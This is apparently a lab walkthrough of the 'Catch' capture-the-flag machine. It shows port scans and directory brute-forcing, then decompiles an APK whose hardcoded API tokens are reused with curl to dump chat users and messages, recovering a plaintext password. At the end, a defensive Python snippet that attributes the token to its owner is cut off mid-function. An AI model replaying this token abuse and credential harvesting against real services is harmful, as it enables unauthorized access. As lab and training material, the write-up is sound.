1. IP Address
# Machine Address
10.10.11.146
# Local Address
10.10.14.68
2. Nmap
nmap -sV -sC -oA nmap/catach 10.10.11.150
# Nmap 7.92 scan initiated Wed Mar 23 00:34:46 2022 as: nmap -sV -sC -oA nmap/catach 10.10.11.150
Nmap scan report for 10.10.11.150
Host is up (0.24s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: i_like_gitea=877f214d45e8e984; Path=/; HttpOnly
| Set-Cookie: _csrf=ivNkrBqg5jEah1UkloDuI_ZNHB06MTY0ODAxMDEwNjI0MjUyNDIxNQ; Path=/; Expires=Thu, 24 Mar 2022 04:35:06 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 23 Mar 2022 04:35:06 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Catch Repositories </title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Set-Cookie: i_like_gitea=3e903b88878d073e; Path=/; HttpOnly
| Set-Cookie: _csrf=9ufU_zzXpFboQzMyNjwlt_a-Nw86MTY0ODAxMDExMzM3MDg0ODA1OA; Path=/; Expires=Thu, 24 Mar 2022 04:35:13 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 23 Mar 2022 04:35:13 GMT
|_ Content-Length: 0
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.29 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=3/23%Time=623AA379%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,30E1,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=877f214d4
SF:5e8e984;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=ivNkrBqg5jEah1U
SF:kloDuI_ZNHB06MTY0ODAxMDEwNjI0MjUyNDIxNQ;\x20Path=/;\x20Expires=Thu,\x20
SF:24\x20Mar\x202022\x2004:35:06\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nS
SF:et-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly\r\nX
SF:-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2023\x20Mar\x202022\x20
SF:04:35:06\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20c
SF:lass=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-
SF:8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20
SF:initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20conten
SF:t=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcy
SF:IsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W
SF:3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,17F
SF:,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i_like
SF:_gitea=3e903b88878d073e;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf
SF:=9ufU_zzXpFboQzMyNjwlt_a-Nw86MTY0ODAxMDExMzM3MDg0ODA1OA;\x20Path=/;\x20
SF:Expires=Thu,\x2024\x20Mar\x202022\x2004:35:13\x20GMT;\x20HttpOnly;\x20S
SF:ameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\
SF:x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2023\x2
SF:0Mar\x202022\x2004:35:13\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTS
SF:PRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 23 00:36:45 2022 -- 1 IP address (1 host up) scanned in 118.70 seconds
nmap -p- --min-rate 10000 -oA nmap/all-tcp 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 00:38 EDT
Nmap scan report for 10.10.11.150
Host is up (0.73s latency).
Not shown: 65221 filtered tcp ports (no-response), 312 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 96.28 seconds
nmap -p 22,80 -sCV -oA nmap/nmap-tcpscripts 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 00:41 EDT
Nmap scan report for 10.10.11.150
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Catch Global Systems
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
nikto -h 10.10.11.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.150
+ Target Hostname: 10.10.11.150
+ Target Port: 80
+ Start Time: 2022-03-23 00:43:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
^C
3. Feroxbuster
feroxbuster -u http://catch.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://catch.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 311c http://catch.htb/javascript
403 9l 28w 274c http://catch.htb/server-status
[####################] - 2m 59998/59998 0s found:2 errors:0
[####################] - 2m 29999/29999 198/s http://catch.htb
[####################] - 2m 29999/29999 199/s http://catch.htb/javascript
feroxbuster -u http://catch.htb/server-status -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
───────────────────────────┬──────────────────────
🎯 Target Url │ http://catch.htb/server-status
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
WLD 9l 28w 274c Got 403 for http://catch.htb/server-status/c6126e3c368e4ff0b48f87ed5ecf5b45 (url length: 32)
WLD - - - Wildcard response is static; auto-filtering 274 responses; toggle this behavior by using --dont-filter
WLD 9l 28w 274c Got 403 for http://catch.htb/server-status/e9069e734a614a2ca82c9fb0be01d0825bf963cdab62453fa32c1db094da487a7195358385974a89881ebf44bb885887 (url length: 96)
[####################] - 2m 29999/29999 0s found:2 errors:0
[####################] - 2m 30001/29999 199/s http://catch.htb/server-status
4. Anbox
adb install catchv1.0.apk
status.catch.htb
sudo systemctl restart snap.anbox.container-manager.service
https://github.com/Debyzulkarnain/anbox-bridge/
chmod +x anbox-bridge.sh
./anbox-bridge.sh
TIME OUT
anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
--container-network-address=192.168.250.1/24 --container-network-gateway=192.168.250.255
5. Apktool
Install
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
## Download jar
https://bitbucket.org/iBotPeaches/apktool/downloads/
mv apktool_2* apktool.jar
sudo mv apktool apktool.jar /usr/local/bin
sudo chmod +x /usr/local/bin/apktool /usr/local/bin/apktool.jar
apktool d catchv1.0.apk
I: Using Apktool 2.6.1 on catchv1.0.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/va4mi/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
-rw-r--r-- 1 va4mi va4mi 980 Mar 27 03:14 AndroidManifest.xml
-rw-r--r-- 1 va4mi va4mi 2.2K Mar 27 03:14 apktool.yml
drwxr-xr-x 1 va4mi va4mi 54 Mar 27 03:14 original
drwxr-xr-x 1 va4mi va4mi 3.3K Mar 27 03:14 res
drwxr-xr-x 1 va4mi va4mi 36 Mar 27 03:14 smali
/home/va4mi/Documents/htb/machine/Catch/apk/catchv1.0/res/values/strings.xml
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="abc_action_bar_home_description">Navigate home</string>
<string name="abc_action_bar_up_description">Navigate up</string>
<string name="abc_action_menu_overflow_description">More options</string>
<string name="abc_action_mode_done">Done</string>
<string name="abc_activity_chooser_view_see_all">See all</string>
<string name="abc_activitychooserview_choose_application">Choose an app</string>
<string name="abc_capital_off">OFF</string>
<string name="abc_capital_on">ON</string>
<string name="abc_menu_alt_shortcut_label">Alt+</string>
<string name="abc_menu_ctrl_shortcut_label">Ctrl+</string>
<string name="abc_menu_delete_shortcut_label">delete</string>
<string name="abc_menu_enter_shortcut_label">enter</string>
<string name="abc_menu_function_shortcut_label">Function+</string>
<string name="abc_menu_meta_shortcut_label">Meta+</string>
<string name="abc_menu_shift_shortcut_label">Shift+</string>
<string name="abc_menu_space_shortcut_label">space</string>
<string name="abc_menu_sym_shortcut_label">Sym+</string>
<string name="abc_prepend_shortcut_label">Menu+</string>
<string name="abc_search_hint">Search…</string>
<string name="abc_searchview_description_clear">Clear query</string>
<string name="abc_searchview_description_query">Search query</string>
<string name="abc_searchview_description_search">Search</string>
<string name="abc_searchview_description_submit">Submit query</string>
<string name="abc_searchview_description_voice">Voice search</string>
<string name="abc_shareactionprovider_share_with">Share with</string>
<string name="abc_shareactionprovider_share_with_application">Share with %s</string>
<string name="abc_toolbar_collapse_description">Collapse</string>
<string name="app_name">Catch</string>
<string name="appbar_scrolling_view_behavior">com.google.android.material.appbar.AppBarLayout$ScrollingViewBehavior</string>
<string name="bottom_sheet_behavior">com.google.android.material.bottomsheet.BottomSheetBehavior</string>
<string name="bottomsheet_action_expand_halfway">Expand halfway</string>
<string name="character_counter_content_description">Characters entered %1$d of %2$d</string>
<string name="character_counter_overflowed_content_description">Character limit exceeded %1$d of %2$d</string>
<string name="character_counter_pattern">%1$d/%2$d</string>
<string name="chip_text">Chip text</string>
<string name="clear_text_end_icon_content_description">Clear text</string>
<string name="error_icon_content_description">Error</string>
<string name="exposed_dropdown_menu_content_description">Show dropdown menu</string>
<string name="fab_transformation_scrim_behavior">com.google.android.material.transformation.FabTransformationScrimBehavior</string>
<string name="fab_transformation_sheet_behavior">com.google.android.material.transformation.FabTransformationSheetBehavior</string>
<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="hide_bottom_view_on_scroll_behavior">com.google.android.material.behavior.HideBottomViewOnScrollBehavior</string>
<string name="icon_content_description">Dialog Icon</string>
<string name="item_view_role_description">Tab</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="material_clock_display_divider">:</string>
<string name="material_clock_toggle_content_description">Select AM or PM</string>
<string name="material_hour_selection">Select hour</string>
<string name="material_hour_suffix">"%1$s o'clock"</string>
<string name="material_minute_selection">Select minutes</string>
<string name="material_minute_suffix">%1$s minutes</string>
<string name="material_slider_range_end">Range end,</string>
<string name="material_slider_range_start">Range start,</string>
<string name="material_timepicker_am">AM</string>
<string name="material_timepicker_clock_mode_description">Switch to clock mode for the time input.</string>
<string name="material_timepicker_hour">Hour</string>
<string name="material_timepicker_minute">Minute</string>
<string name="material_timepicker_pm">PM</string>
<string name="material_timepicker_select_time">Select time</string>
<string name="material_timepicker_text_input_mode_description">Switch to text input mode for the time input.</string>
<string name="mtrl_badge_numberless_content_description">New notification</string>
<string name="mtrl_chip_close_icon_content_description">Remove %1$s</string>
<string name="mtrl_exceed_max_badge_number_content_description">More than %1$d new notifications</string>
<string name="mtrl_exceed_max_badge_number_suffix">%1$d%2$s</string>
<string name="mtrl_picker_a11y_next_month">Change to next month</string>
<string name="mtrl_picker_a11y_prev_month">Change to previous month</string>
<string name="mtrl_picker_announce_current_selection">Current selection: %1$s</string>
<string name="mtrl_picker_cancel">@android:string/cancel</string>
<string name="mtrl_picker_confirm">@android:string/ok</string>
<string name="mtrl_picker_date_header_selected">%1$s</string>
<string name="mtrl_picker_date_header_title">Select Date</string>
<string name="mtrl_picker_date_header_unselected">Selected date</string>
<string name="mtrl_picker_day_of_week_column_header">Column of days: %1$s</string>
<string name="mtrl_picker_invalid_format">Invalid format.</string>
<string name="mtrl_picker_invalid_format_example">Example: %1$s</string>
<string name="mtrl_picker_invalid_format_use">Use: %1$s</string>
<string name="mtrl_picker_invalid_range">Invalid range.</string>
<string name="mtrl_picker_navigate_to_year_description">Navigate to year %1$s</string>
<string name="mtrl_picker_out_of_range">Out of range: %1$s</string>
<string name="mtrl_picker_range_header_only_end_selected">Start date – %1$s</string>
<string name="mtrl_picker_range_header_only_start_selected">%1$s – End date</string>
<string name="mtrl_picker_range_header_selected">%1$s – %2$s</string>
<string name="mtrl_picker_range_header_title">Select Range</string>
<string name="mtrl_picker_range_header_unselected">Start date – End date</string>
<string name="mtrl_picker_save">Save</string>
<string name="mtrl_picker_text_input_date_hint">Date</string>
<string name="mtrl_picker_text_input_date_range_end_hint">End date</string>
<string name="mtrl_picker_text_input_date_range_start_hint">Start date</string>
<string name="mtrl_picker_text_input_day_abbr">d</string>
<string name="mtrl_picker_text_input_month_abbr">m</string>
<string name="mtrl_picker_text_input_year_abbr">y</string>
<string name="mtrl_picker_toggle_to_calendar_input_mode">Switch to calendar input mode</string>
<string name="mtrl_picker_toggle_to_day_selection">Tap to switch to selecting a day</string>
<string name="mtrl_picker_toggle_to_text_input_mode">Switch to text input mode</string>
<string name="mtrl_picker_toggle_to_year_selection">Tap to switch to selecting a year</string>
<string name="password_toggle_content_description">Show password</string>
<string name="path_password_eye">M12,4.5C7,4.5 2.73,7.61 1,12c1.73,4.39 6,7.5 11,7.5s9.27,-3.11 11,-7.5c-1.73,-4.39 -6,-7.5 -11,-7.5zM12,17c-2.76,0 -5,-2.24 -5,-5s2.24,-5 5,-5 5,2.24 5,5 -2.24,5 -5,5zM12,9c-1.66,0 -3,1.34 -3,3s1.34,3 3,3 3,-1.34 3,-3 -1.34,-3 -3,-3z</string>
<string name="path_password_eye_mask_strike_through">M2,4.27 L19.73,22 L22.27,19.46 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
<string name="path_password_eye_mask_visible">M2,4.27 L2,4.27 L4.54,1.73 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
<string name="path_password_strike_through">M3.27,4.27 L19.74,20.74</string>
<string name="search_menu_title">Search</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>
<string name="status_bar_notification_info_overflow">999+</string>
</resources>
<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>
6. Lets-chat
gitea_token -> port 3000 (Gitea)
lets_chat_token -> port 5000 (Let's Chat)
http://catch.htb:5000/login
Request:
GET /login HTTP/1.1
Host: catch.htb:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: i_like_gitea=79ce62633af6c717; _csrf=b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0; redirect_to=%2F; connect.sid=s%3A0u7u5fEybnLbA896XWTce2Lm-EO18xLx.GY6CynY9cKqQ%2F4TgrqbjKH4C%2F8RHMYI1rRUfNnNv2DY
Upgrade-Insecure-Requests: 1
If-None-Match: W/"a3d-MtLmehC+UNT/n7d5xdwnaq9VCK8"
Cache-Control: max-age=0
API requests must be authenticated using Basic Authentication or with a Bearer token. In both cases an API token is required.
curl http://catch.htb:5000/rooms -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
rooms.json
[
{
"id": "61b86b28d984e2451036eb17",
"slug": "status",
"name": "Status",
"description": "Cachet Updates and Maintenance",
"lastActive": "2021-12-14T10:34:20.749Z",
"created": "2021-12-14T10:00:08.384Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b8708efe190b466d476bfb",
"slug": "android_dev",
"name": "Android Development",
"description": "Android App Updates, Issues & More",
"lastActive": "2021-12-14T10:24:21.145Z",
"created": "2021-12-14T10:23:10.474Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b86b3fd984e2451036eb18",
"slug": "employees",
"name": "Employees",
"description": "New Joinees, Org updates",
"lastActive": "2021-12-14T10:18:04.710Z",
"created": "2021-12-14T10:00:31.043Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
}
]
curl http://catch.htb:5000/users -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq . >> users.json
[
{
"id": "61b86aead984e2451036eb16",
"firstName": "Administrator",
"lastName": "NA",
"username": "admin",
"displayName": "Admin",
"avatar": "e2b5310ec47bba317c5f1b5889e96f04",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18",
"61b8708efe190b466d476bfb"
]
},
{
"id": "61b86dbdfe190b466d476bf0",
"firstName": "John",
"lastName": "Smith",
"username": "john",
"displayName": "John",
"avatar": "f5504305b704452bba9c94e228f271c4",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86e40fe190b466d476bf2",
"firstName": "Will",
"lastName": "Robinson",
"username": "will",
"displayName": "Will",
"avatar": "7c6143461e935a67981cc292e53c58fc",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86f15fe190b466d476bf5",
"firstName": "Lucas",
"lastName": "NA",
"username": "lucas",
"displayName": "Lucas",
"avatar": "b36396794553376673623dc0f6dec9bb",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18"
]
}
]
Messages in room 61b86b3fd984e2451036eb18 (employees):
curl http://catch.htb:5000/rooms/61b86b3fd984e2451036eb18/messages -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
[
{
"id": "61b86f5cfe190b466d476bf7",
"text": "Thanks @admin ",
"posted": "2021-12-14T10:18:04.710Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86ef2fe190b466d476bf4",
"text": "Please welcome our new IT Admin - Lucas, a crucial role that will help Catch’s revenue and will contribute to the overall profitability of the company!",
"posted": "2021-12-14T10:16:18.187Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86e5dfe190b466d476bf3",
"text": "Thanks John! Glad to be part of the Catch ",
"posted": "2021-12-14T10:13:49.568Z",
"owner": "61b86e40fe190b466d476bf2",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86e12fe190b466d476bf1",
"text": "Welcome Will!",
"posted": "2021-12-14T10:12:34.388Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86d5ffe190b466d476bef",
"text": "Join me in welcoming our new employee Will Robinson who's working as iOS Developer with John Team",
"posted": "2021-12-14T10:09:35.597Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b3fd984e2451036eb18"
}
]
Messages in room 61b86b28d984e2451036eb17 (status):
curl http://catch.htb:5000/rooms/61b86b28d984e2451036eb17/messages -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
[
{
"id": "61b8732cfe190b466d476c02",
"text": "ah sure!",
"posted": "2021-12-14T10:34:20.749Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8731ffe190b466d476c01",
"text": "You should actually include this task to your list as well as a part of quarterly audit",
"posted": "2021-12-14T10:34:07.449Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b872b9fe190b466d476c00",
"text": "Also make sure we've our systems, applications and databases up-to-date.",
"posted": "2021-12-14T10:32:25.514Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87282fe190b466d476bff",
"text": "Excellent! ",
"posted": "2021-12-14T10:31:30.403Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87277fe190b466d476bfe",
"text": "Why not. We've this in our todo list for next quarter",
"posted": "2021-12-14T10:31:19.094Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87241fe190b466d476bfd",
"text": "@john is it possible to add SSL to our status domain to make sure everything is secure ? ",
"posted": "2021-12-14T10:30:25.108Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8702dfe190b466d476bfa",
"text": "Here are the credentials `john : E}V!mywu_69T4C}W`",
"posted": "2021-12-14T10:21:33.859Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87010fe190b466d476bf9",
"text": "Sure one sec.",
"posted": "2021-12-14T10:21:04.635Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86fb1fe190b466d476bf8",
"text": "Can you create an account for me ? ",
"posted": "2021-12-14T10:19:29.677Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86f4dfe190b466d476bf6",
"text": "Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. ",
"posted": "2021-12-14T10:17:49.761Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
}
]
john : E}V!mywu_69T4C}W
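The room dumps above are also what an incident responder works from once the token is known to be exposed: which account does the token belong to, and what was said in the rooms it can read. As an added example (not code from this page or from Let's Chat), the following Python decodes the leaked bearer token, which is base64 of `<user id>:<secret>` (the lets_chat_token above decodes to the admin user's id from users.json followed by a secret), attributes it to an account via the users listing, and lists the messages in which credentials were shared so the affected accounts can be rotated. The JSON excerpts and the secret inside the sample token are constructed; the user ids and usernames are those shown on this page, and the credential hint patterns are my own.

```python
import base64
import json
import re

# Constructed excerpts modelled on the users.json and /rooms/<id>/messages output above.
# User ids and usernames are the ones on this page; message texts are placeholders.
USERS_JSON = """[
  {"id": "61b86aead984e2451036eb16", "username": "admin"},
  {"id": "61b86dbdfe190b466d476bf0", "username": "john"},
  {"id": "61b86f15fe190b466d476bf5", "username": "lucas"}
]"""

MESSAGES_JSON = """[
  {"id": "m1", "text": "ah sure!", "posted": "2021-12-14T10:34:20.749Z",
   "owner": "61b86dbdfe190b466d476bf0", "room": "61b86b28d984e2451036eb17"},
  {"id": "m2", "text": "Here are the credentials `john : Placeholder#1`",
   "posted": "2021-12-14T10:21:33.859Z",
   "owner": "61b86f15fe190b466d476bf5", "room": "61b86b28d984e2451036eb17"},
  {"id": "m3", "text": "Please reset your password before the audit",
   "posted": "2021-12-14T10:32:25.514Z",
   "owner": "61b86aead984e2451036eb16", "room": "61b86b28d984e2451036eb17"}
]"""

# Sample token in the same shape as the leaked one (base64 of "<user id>:<secret>"),
# built with the admin id from the page and a placeholder secret.
SAMPLE_TOKEN = base64.b64encode(b"61b86aead984e2451036eb16:" + b"0" * 40).decode()

# Words that suggest a message is about credentials, and a `name : value` pair
# with a space-free value of at least 8 characters (backticks are excluded from the value).
CRED_HINTS = re.compile(r"\b(credential|password|passwd|token|api[ _-]?key)s?\b", re.IGNORECASE)
CRED_PAIR = re.compile(r"([a-z][a-z0-9_.-]{2,30})\s*:\s*([^\s`]{8,})")


def token_owner(bearer_token):
    """Return the user id a Let's Chat API token was issued to.

    Raises ValueError when the token does not decode to a 24-hex-char id and a secret."""
    raw = base64.b64decode(bearer_token).decode("ascii")
    user_id, sep, secret = raw.partition(":")
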